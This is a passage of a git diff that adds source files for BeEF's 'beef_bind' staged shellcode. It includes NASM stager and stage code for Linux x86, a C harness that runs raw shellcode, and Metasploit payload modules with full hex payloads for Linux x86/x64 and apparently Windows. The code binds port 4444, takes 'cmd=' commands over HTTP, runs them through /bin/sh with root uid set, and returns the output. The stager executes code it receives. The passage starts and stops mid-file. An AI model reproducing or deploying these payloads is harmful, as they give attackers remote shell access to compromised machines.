+	jmp short search ;search some more
+found:
+	push BYTE 0x04 ;skip "cmd="
+	pop rax
+	add rsi, rax
+	jmp rsi ;jump to stage
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/socket.c b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/socket.c
new file mode 100644
index 000000000..f4e198fa3
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/socket.c
@@ -0,0 +1,27 @@
+/**
+ Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ Browser Exploitation Framework (BeEF) - http://beefproject.com
+ See the file 'doc/COPYING' for copying permission
+ 
+ The C-skeleton to compile and test this shellcode is used with kind permission of Vivek Ramachandran. A standalone version can be compiled with:
+ #gcc -m32 -fno-stack-protector -z execstack -o socket socket.c
+**/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] = "\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7";
+
+int main(int argc, char **argv) {
+   char *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+   if (ptr == MAP_FAILED) {perror("mmap");exit(-1);}
+   memcpy(ptr, shellcode, sizeof(shellcode));
+   sc = (int(*)())ptr;
+   (void)((void(*)())ptr)();
+   printf("\n");
+   return 0;
+}
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stage.nasm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stage.nasm
new file mode 100644
index 000000000..3ec5d952b
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stage.nasm
@@ -0,0 +1,290 @@
+; Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+; Browser Exploitation Framework (BeEF) - http://beefproject.com
+; See the file 'doc/COPYING' for copying permission
+
+BITS 32
+
+SECTION .text
+
+global _start
+_start:
+	cld ;clear direction flag
+	xor edx, edx ;zero edx
+
+	push BYTE 0x02
+	pop ecx
+	;create two pipes
+createpipes:
+	push edx ;allocate space on stack
+	push edx
+	mov ebx, esp ; ptr to argument array
+	push BYTE 0x2A ;sys_pipe
+	pop eax
+	int 0x80 ;syscall 
+	dec ecx 
+	jcxz endcreatepipes ;jmp when both pipes are created
+	jmp short createpipes ;create next pipe
+
+endcreatepipes:	
+	;create fork	
+	xor ebx, ebx ;zero ebx
+	push BYTE 0x02 ;sys_fork
+	pop eax
+	int 0x80 ;syscall
+	cmp eax, 0x00 ;parent or child
+	je child
+
+	mov ebx, [esp+0x8] ;close read end of one pipe
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+
+	mov ebx, [esp+0x4] ;close write end of the other pipe
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+
+	; make non blocking
+	mov ebx, [esp] ;fd
+	push BYTE 0x04 ;F_SETFL
+	pop ecx
+	push 0x800 ;O_NONBLOCK
+	pop edx
+	push BYTE 0x37 ;sys_fcntl
+	pop eax
+	int 0x80
+ 
+	;allocate one page of memory
+	push BYTE 0x00 ;offset = 0
+	push 0xffffffff ;fd=-1
+	push BYTE 0x22 ;MAP_ANONYMOUS | MAP_PRIVATE
+	push BYTE 0x07 ;PROT_READ | PROT_WRITE | PROT_EXEC
+	push 0x1000 ;allocated size
+	push 0x00 ;system determines location
+	mov ebx, esp ;ptr to argument array
+	push BYTE 0x5a
+	pop eax
+	int 0x80
+	mov edi, eax ;ptr to allocated memory
+	add esp, 0x18
+	
+doforever:
+	xor edx, edx
+	xor eax, eax
+
+	;initialize socket
+	push BYTE 0x01
+	pop ebx ;SYS_SOCKET
+	push eax ;proto = 0
+	inc eax
+	push eax ;SOCK_STREAM = 1
+	inc eax
+	push eax ;AF_INET = 2
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+	mov esi, eax ; save socket filedescriptor
+	add esp, 0x0C
+
+	;reuse socket
+	push BYTE 0x0E
+	pop ebx ;SYS_SETSOCKOPT
+	push BYTE 0x04 ;sizeof socklen_t
+	push esp ;address of socklen_t
+	push BYTE 0x02 ;SO_REUSEADDR = 2
+	push BYTE 0x01 ;SOL_SOCKET = 1
+	push esi ;socket fd
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102	
+	int 0x80
+	add esp, 0x14
+
+	;bind socket to port
+	push BYTE 0x02
+	pop ebx ;SYS_BIND
+	push edx ;INADDR_ANY
+	push 0x5c110002 ;PORT 0x115c = 4444
+	mov ecx, esp ;ptr to server struct
+	push BYTE 0x10 ; addrlen
+	push ecx
+	push esi ;socketfd
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+	add esp, 0x14
+
+	inc ebx
+	inc ebx  ;SYS_LISTEN
+	push ebx ;backlog
+	push esi ;socketfd
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ; socketcall is syscall #102
+	int 0x80
+	add esp, 0x08
+	
+	inc ebx ;SYS_ACCEPT
+	push edx ;socklen = 0
+	push edx ;sockaddr ptr = NULL
+	push esi ;sockfd
+	mov ecx, esp ;ptr to argumet array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+	add esp, 0x0c
+	
+	xchg esi, eax ;serversocket in eax and clientsocket handler in esi
+	xchg eax, ebx ;serversocket in ebx
+	mov eax, 0x06 ;close serversocket
+	int 0x80
+
+	mov ecx, 0x1000
+firstzeromemory:
+	;zero out memory
+	dec ecx
+	mov ebx, edi
+	add ebx, ecx
+	mov BYTE [ebx], 0x00
+	jecxz readfromsocket
+	jmp firstzeromemory
+
+readfromsocket:
+	;read from socket into memory
+	mov dx, 0x400 ;read 1024 bytes
+	mov ecx, edi ;ptr to allocated memory
+	mov ebx, esi ;clientsocket
+	push BYTE 0x03
+	pop eax ;sys_read
+	int 0x80
+
+	push edi ;ptr to allocate memory
+	push esi ;clientsocket
+	mov ebx, edi ;ptr to allocated memory
+	mov ecx, 0x400 ;search in 1024 bytes
+search:
+	cmp DWORD [ebx], 0x3d646D63 ;compare with "cmd="
+	je found ;cmd= found
+	inc ebx
+	dec ecx
+	jecxz notfound ;cmd= not in recieved buffer
+	jmp search ;search some more
+
+found:
+	mov ecx, ebx ;put ptr to memory where "cmd=" was found
+	add ecx, 0x03 ;skip "cmd"
+	mov ebx, [esp+0x14] ;write to pipe
+sendcommand:
+	inc ecx ;first time skip "=", move to next byte
+	push BYTE 0x01 ;write one byte
+	pop edx
+	push BYTE 0x04 ;sys_write
+	pop eax
+	int 0x80
+	cmp BYTE [ecx], 0x0a ;LF character?
+	jne sendcommand ;else continue write to pipe
+
+	;sleep one second
+	push 0x00
+	push 0x01 ;one second
+	mov ebx, esp ;ptr to argument array
+	xor ecx, ecx ;NULL
+	mov eax, 0xA2 ;sys_nanosleep
+	int 0x80
+	add esp, 0x08 ;clean up stack	
+
+notfound:
+	call writehttpheaders	
+	db 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20,0x32,0x30,0x30,0x20,0x4f,0x4b,0x0d,0x0a  ;HTTP/1.1 200 OK
+	db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x0d,0x0a  ;Content-Type: text/html
+	db 0x41,0x63,0x63,0x65,0x73,0x73,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x2d,0x41,0x6c,0x6c,0x6f,0x77,0x2d,0x4f,0x72,0x69,0x67,0x69,0x6e,0x3a,0x20,0x2a,0x0d,0x0a  ;Access-Control-Allow-Origin: *
+	db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x33,0x30,0x34,0x38,0x0d,0x0a,0x0d,0x0a  ;Content-Length: 3048
+
+writehttpheaders:
+	pop esi ;source address saved by call
+	add edi, 0x400 ;ptr to memory skip 1024 bytes
+	mov ecx, 0x62 ;copy 98 bytes
+	rep movsb
+	
+	pop edi ;restore clientsocket 	
+	pop esi ;restore ptr to memory
+	
+		
+	mov ebx, [esp] ;read from pipe
+	mov ecx, esi ;ptr to memory
+	add ecx, 0x400 ;skip 1024 bytes
+	add ecx, 0x62 ;skip header
+	push 0xB86 ;read max 2950 bytes
+	pop edx
+	push BYTE 0x03 ;sys_read
+	pop eax
+	int 0x80
+
+	mov ebx, edi ;clientsocket
+	mov ecx, esi ;ptr to memory
+	add ecx, 0x400 ;skip 1024 first bytes
+	mov edx, 0xbe8 ;send max 3048 bytes
+	push BYTE 0x04 ;sys_write
+	pop eax
+	int 0x80
+
+	;close clientsocket	
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+
+	mov edi, esi ;restore memory ptr into edi
+	jmp doforever
+
+child:
+	mov ebx, [esp+0xC] ;close output side of pipe 
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+	
+	xor ebx, ebx ;close stdin
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+
+	mov ebx, [esp+0x8] ;dup input side to stdin
+	push BYTE 0x29 ;sys_dup
+	pop eax
+	int 0x80
+	
+	mov ebx, [esp] ;close input side of other pipe
+	push BYTE 0x06
+	pop eax
+	int 0x80
+
+	xor ebx, ebx
+	inc ebx ;close stdout
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+
+	mov ebx, [esp+0x4] ;dup output side to stdout
+	push BYTE 0x29 ;sys_dup
+	pop eax
+	int 0x80
+
+	;setresuid(0,0,0)
+	xor eax, eax
+	xor ebx, ebx
+	xor ecx, ecx
+	xor edx, edx
+	mov al, 0xa4 ;sys_setresuid16
+	int 0x80
+
+	;execve("/bin//sh", 0, 0)	
+	xor eax, eax
+	push eax
+	push eax
+	push 0x68732f2f ;//sh
+	push 0x6e69622f ;/bin
+	mov ebx, esp
+	push BYTE 0x0b ;sys_execve
+	pop eax
+	int 0x80
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stager.nasm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stager.nasm
new file mode 100644
index 000000000..903a7f0b4
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stager.nasm
@@ -0,0 +1,111 @@
+; Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+; Browser Exploitation Framework (BeEF) - http://beefproject.com
+; See the file 'doc/COPYING' for copying permission
+
+BITS 32
+
+SECTION .text
+
+global _start
+_start:
+	cld ;clear direction flag
+	xor eax, eax ;zero eax
+	xor edx, edx ;zero edx
+
+	;initialize socket
+	push BYTE 0x01
+	pop ebx ;SYS_SOCKET
+	push eax ;  proto = 0 
+	inc eax
+	push eax ;SOCK_STREAM = 1
+	inc eax 
+	push eax ;AF_INET = 2
+	mov ecx, esp ; ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102	
+	int 0x80
+	mov esi, eax ;save socket filediscriptor
+
+	push BYTE 0x0E
+	pop ebx ;SYS_SETSOCKOPT
+	push BYTE 0x04  ;sizeof socklen_t
+	push esp ; address of socklen_t
+	push BYTE 0x02  ;SO_REUSEADDR = 2
+	push BYTE 0x01 ;SOL_SOCKET = 1
+	push esi ;socket fd
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ; socketcall is syscall #102
+	int 0x80
+
+	;bind socket to port
+	push BYTE 0x02
+	pop ebx ;SYS_BIND
+	push edx ;INADDR_ANY
+	push 0x5c110002 ;PORT 0x115C = 4444
+	mov ecx, esp ;server struct
+	push BYTE 0x10 ;addrlen
+	push ecx
+	push esi ;socketfd
+	mov ecx, esp ; ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+
+	inc ebx
+	inc ebx ;SYS_LISTEN
+	push ebx ;backlog
+	push esi ;socketfd
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+
+	inc ebx ;SYS_ACCEPT
+	push edx ;socklen = 0
+	push edx ;sockaddr ptr = NULL
+	push esi ;socketfd
+	mov ecx, esp ; ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+
+	xchg esi, eax ;serversocket in eax and client socket handler into esi
+	xchg eax, ebx ;serversocket in ebx
+	mov eax, 0x6 ;close serversocket
+	int 0x80
+
+	push BYTE 0x00 ;offset =0
+	push 0xFFFFFFFF ;fd = -1
+	push BYTE 0x22 ;MAP_ANONYMOUS | MAP_PRIVATE
+	push BYTE 0x07 ;PROT_READ | PROT_WRITE | PROT_EXEC
+	push 0x1000 ;allocated size
+	push BYTE 0x00 ;system determines location
+	mov ebx, esp ;ptr tot argument array
+	push BYTE 0x5a
+	pop eax ;MMAP call
+	int 0x80
+	mov edi, eax ;ptr to allocated memory
+
+	; read from socket into memory
+	mov dx, 0x1000 ;max bytes to read
+	mov ecx, edi ;pointer to memory
+	mov ebx, esi ;clientsocket
+	push BYTE 0x03
+	pop eax
+	int 0x80	
+
+	push BYTE 0x06
+	pop eax ;close clientsocket
+	int 0x80
+
+search:
+	cmp DWORD [edi], 0x3d646d63 ;compare with "cmd="
+	je short found ;jump if found
+	inc edi ;look some further
+	jmp short search
+found:
+	push BYTE 0x04 
+	pop eax
+	add edi, eax ;skip "cmd="
+	jmp edi ;jump to the staged shellcode
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-handler.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-handler.rb
new file mode 100644
index 000000000..29be93ecd
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-handler.rb
@@ -0,0 +1,73 @@
+##
+# $Id: beef_bind-handler.rb 121018 Ty Miller @ Threat Intelligence$
+##
+
+module Msf
+module Handler
+
+###
+#
+# This module implements the Bind TCP handler placeholder only.
+#
+###
+module BeEFBind
+
+	include Msf::Handler
+
+	#
+	# Returns the handler specific string representation
+	#
+	def self.handler_type
+		return "beef_bind"
+	end
+
+	#
+	# Returns the connection oriented general handler type
+	#
+	def self.general_handler_type
+		"bind"
+	end
+
+	#
+	# Initializes a bind handler and adds the options common to all bind
+	# payloads, such as local port.
+	#
+	def initialize(info = {})
+		super
+		register_options(
+			[
+				Opt::LPORT(4444),
+				#OptAddress.new('RHOST', [false, 'The target address', '']),
+			], Msf::Handler::BeEFBind)
+	end
+
+	#
+	# Placeholder only
+	#
+	def cleanup_handler
+	end
+
+	#
+	# Placeholder only
+	#
+	def add_handler(opts={})
+		# Start a new handler
+		start_handler
+	end
+
+	#
+	# Placeholder only
+	#
+	def start_handler
+	end
+
+	# 
+	# Placeholder only
+	#
+	def stop_handler
+	end
+
+end
+
+end
+end
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x64.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x64.rb
new file mode 100644
index 000000000..99079e92f
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x64.rb
@@ -0,0 +1,85 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Linux
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'BeEF Bind Linux Command Shell Stage (stage x64)',
+			'Description'   => 'Spawn a piped command shell (staged) with an HTTP interface',
+			'Author'        => [ 'Bart Leppens' ],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_X64,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadCompat' =>
+				{
+					'Convention' => 'beef_bind'
+				},
+			'Stage'         =>
+				{
+					'Offsets' =>
+						{
+							'LPORT' => [ 165, 'n' ]
+						},
+					'Payload' =>
+						"\xfc\x48\x31\xd2\x6a\x02\x41\x5e\x52\x48\x89\xe7\x6a\x16\x58\x0f" +
+						"\x05\x49\xff\xce\x4d\x85\xf6\x74\x02\xeb\xed\x6a\x39\x58\x0f\x05" +
+						"\x83\xf8\x00\x0f\x84\xdd\x01\x00\x00\x48\x31\xff\x8b\x7c\x24\x08" +
+						"\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x03\x58\x0f\x05\x8b\x3c" +
+						"\x24\x6a\x04\x5e\x48\x31\xd2\xba\x00\x08\x00\x00\x6a\x48\x58\x0f" +
+						"\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41" +
+						"\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x48" +
+						"\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3" +
+						"\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48" +
+						"\x89\xdf\x6a\x36\x58\x0f\x05\x58\x48\x31\xc0\x6a\x10\x5a\x50\x50" +
+						"\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58" +
+						"\x0f\x05\x58\x58\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48" +
+						"\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7" +
+						"\x48\x89\xdf\x6a\x03\x58\x0f\x05\xb9\x00\x10\x00\x00\x48\xff\xc9" +
+						"\x4c\x89\xf3\x48\x01\xcb\xc6\x03\x00\xe3\x02\xeb\xf0\x48\x31\xd2" +
+						"\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x04\x6a\x00\x58\x0f\x05\xb9" +
+						"\x00\x04\x00\x00\x4c\x89\xf3\x81\x3b\x63\x6d\x64\x3d\x74\x0a\x48" +
+						"\xff\xc3\x48\xff\xc9\xe3\x34\xeb\xee\x48\x31\xff\x48\x89\xd9\x48" +
+						"\x83\xc1\x03\x48\x89\xce\x8b\x7c\x24\x0c\x48\xff\xc6\x6a\x01\x5a" +
+						"\x6a\x01\x58\x0f\x05\x80\x3e\x0a\x75\xf0\x6a\x23\x58\x6a\x00\x6a" +
+						"\x01\x48\x89\xe7\x48\x31\xf6\x0f\x05\x58\x58\xe8\x62\x00\x00\x00" +
+						"\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d" +
+						"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74" +
+						"\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73" +
+						"\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f" +
+						"\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" +
+						"\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a" +
+						"\x0d\x0a\x5e\x4c\x89\xf7\x48\x81\xc7\x00\x04\x00\x00\xb9\x62\x00" +
+						"\x00\x00\xf3\xa4\x48\x31\xff\x8b\x3c\x24\x4c\x89\xf6\x48\x81\xc6" +
+						"\x00\x04\x00\x00\x48\x83\xc6\x62\xba\x86\x0b\x00\x00\x48\x31\xc0" +
+						"\x0f\x05\x4c\x89\xff\x4c\x89\xf6\x48\x81\xc6\x00\x04\x00\x00\xba" +
+						"\xe8\x0b\x00\x00\x6a\x01\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f" +
+						"\x05\xe9\x69\xfe\xff\xff\x48\x31\xff\x8b\x7c\x24\x0c\x6a\x03\x58" +
+						"\x0f\x05\x48\x31\xff\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x08\x6a\x20" +
+						"\x58\x0f\x05\x8b\x3c\x24\x6a\x03\x58\x0f\x05\x48\x31\xff\x48\xff" +
+						"\xc7\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x20\x58\x0f\x05\x48" +
+						"\x31\xff\x48\x31\xf6\x48\x31\xd2\x6a\x75\x58\x0f\x05\x6a\x3b\x58" +
+						"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\x48\x31" +
+						"\xf6\x48\x31\xd2\x0f\x05"
+				}
+			))
+	end
+
+	# Stage encoding is safe for this payload
+	def encode_stage?
+		true
+	end
+end
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x86.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x86.rb
new file mode 100644
index 000000000..bbb9e715f
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x86.rb
@@ -0,0 +1,84 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Linux
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'BeEF Bind Linux Command Shell Stage (stage x86)',
+			'Description'   => 'Spawn a piped command shell (staged) with an HTTP interface',
+			'Author'        => [ 'Bart Leppens' ],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_X86,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadCompat' =>
+				{
+					'Convention' => 'beef_bind'
+				},
+			'Stage'         =>
+				{
+					'Offsets' =>
+						{
+							'LPORT' => [ 168, 'n' ]
+						},
+					'Payload' =>
+						"\xfc\x31\xd2\x6a\x02\x59\x52\x52\x89\xe3\x6a\x2a\x58\xcd\x80\x49" +
+						"\x67\xe3\x02\xeb\xf1\x31\xdb\x6a\x02\x58\xcd\x80\x3d\x00\x00\x00" +
+						"\x00\x0f\x84\xe4\x01\x00\x00\x8b\x5c\x24\x08\x6a\x06\x58\xcd\x80" +
+						"\x8b\x5c\x24\x04\x6a\x06\x58\xcd\x80\x8b\x1c\x24\x6a\x04\x59\x68" +
+						"\x00\x08\x00\x00\x5a\x6a\x37\x58\xcd\x80\x6a\x00\x68\xff\xff\xff" +
+						"\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x68\x00\x00\x00\x00\x89" +
+						"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x81\xc4\x18\x00\x00\x00\x31\xd2" +
+						"\x31\xc0\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd" +
+						"\x80\x89\xc6\x81\xc4\x0c\x00\x00\x00\x6a\x0e\x5b\x6a\x04\x54\x6a" +
+						"\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00" +
+						"\x00\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56" +
+						"\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00\x00\x43\x43\x53" +
+						"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x08\x00\x00\x00\x43\x52" +
+						"\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x0c\x00\x00\x00\x96" +
+						"\x93\xb8\x06\x00\x00\x00\xcd\x80\xb9\x00\x10\x00\x00\x49\x89\xfb" +
+						"\x01\xcb\xc6\x03\x00\xe3\x05\xe9\xf1\xff\xff\xff\x66\xba\x00\x04" +
+						"\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x57\x56\x89\xfb\xb9\x00\x04" +
+						"\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x09\x43\x49\xe3\x3a\xe9\xef" +
+						"\xff\xff\xff\x89\xd9\x81\xc1\x03\x00\x00\x00\x8b\x5c\x24\x14\x41" +
+						"\x6a\x01\x5a\x6a\x04\x58\xcd\x80\x80\x39\x0a\x75\xf2\x68\x00\x00" +
+						"\x00\x00\x68\x01\x00\x00\x00\x89\xe3\x31\xc9\xb8\xa2\x00\x00\x00" +
+						"\xcd\x80\x81\xc4\x08\x00\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54" +
+						"\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d\x0a\x43\x6f" +
+						"\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74" +
+						"\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f" +
+						"\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f\x72\x69\x67" +
+						"\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" +
+						"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a\x0d\x0a\x5e" +
+						"\x81\xc7\x00\x04\x00\x00\xb9\x62\x00\x00\x00\xf3\xa4\x5f\x5e\x8b" +
+						"\x1c\x24\x89\xf1\x81\xc1\x00\x04\x00\x00\x81\xc1\x62\x00\x00\x00" +
+						"\x68\x86\x0b\x00\x00\x5a\x6a\x03\x58\xcd\x80\x89\xfb\x89\xf1\x81" +
+						"\xc1\x00\x04\x00\x00\xba\xe8\x0b\x00\x00\x6a\x04\x58\xcd\x80\x6a" +
+						"\x06\x58\xcd\x80\x89\xf7\xe9\x63\xfe\xff\xff\x8b\x5c\x24\x0c\x6a" +
+						"\x06\x58\xcd\x80\x31\xdb\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x08\x6a" +
+						"\x29\x58\xcd\x80\x8b\x1c\x24\x6a\x06\x58\xcd\x80\x31\xdb\x43\x6a" +
+						"\x06\x58\xcd\x80\x8b\x5c\x24\x04\x6a\x29\x58\xcd\x80\x31\xc0\x31" +
+						"\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\x50\x50\x68\x2f\x2f" +
+						"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58\xcd\x80"
+				}
+			))
+	end
+
+	# Stage encoding is safe for this payload
+	def encode_stage?
+		true
+	end
+end
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-windows-x86.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-windows-x86.rb
new file mode 100644
index 000000000..c9dc7767d
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-windows-x86.rb
@@ -0,0 +1,137 @@
+##
+# $Id: beef_bind-stage.rb 121018 Ty Miller @ Threat Intelligence$
+##
+
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Windows
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'BeEF Bind Windows Command Shell Stage (stager)',
+			'Version'       => '$Revision: 11421 $',
+			'Description'   => 'Spawn a piped command shell (staged) with an HTTP interface',
+			'Author'        => [ 'Ty Miller' ],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'win',
+			'Arch'          => ARCH_X86,
+			'Session'       => Msf::Sessions::CommandShellWindows,
+			'PayloadCompat' =>
+				{
